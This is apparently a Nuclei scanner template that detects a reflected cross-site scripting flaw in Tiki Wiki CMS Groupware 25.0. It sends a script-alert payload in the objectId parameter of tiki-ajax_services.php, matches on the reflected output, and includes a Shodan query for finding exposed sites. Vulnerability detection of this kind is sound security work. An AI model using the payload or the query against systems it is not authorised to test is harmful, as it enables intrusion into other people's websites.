id: tikiwiki-xss

info:
  name: Tiki Wiki CMS Groupware v25.0 - Cross Site Scripting
  author: arafatansari
  severity: medium
  description: |
    Tiki Wiki CMS Groupware version 25.0 suffers from a cross site scripting vulnerability.
  reference:
    - https://packetstormsecurity.com/files/170446/Tiki-Wiki-CMS-Groupware-25.0-Cross-Site-Scripting.html
  metadata:
    verified: true
    max-request: 2
    shodan-query: http.html:"tiki wiki"
  tags: edb,xss,tikiwiki,packetstorm,acketstorm

http:
  - method: GET
    path:
      - "{{BaseURL}}/tiki/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>"
      - "{{BaseURL}}/tiki-ajax_services.php?controller=comment&action=list&type=wiki+page&objectId=<script>alert(document.domain)</script>"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<script>alert(document.domain)</script>'
          - 'Tiki Wiki CMS'
        condition: and

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 403

# digest: 4a0a0047304502206df242743117e9418ad65f8ef8342f4ca2f29c39eeeaf447014b09dc677d7317022100dde814f9d8ea3c3a14040c663c34ce13d32e54bc5b4a957d87ba2f6b3ad0732e:922c64590222798bb761d5b6d8e72950
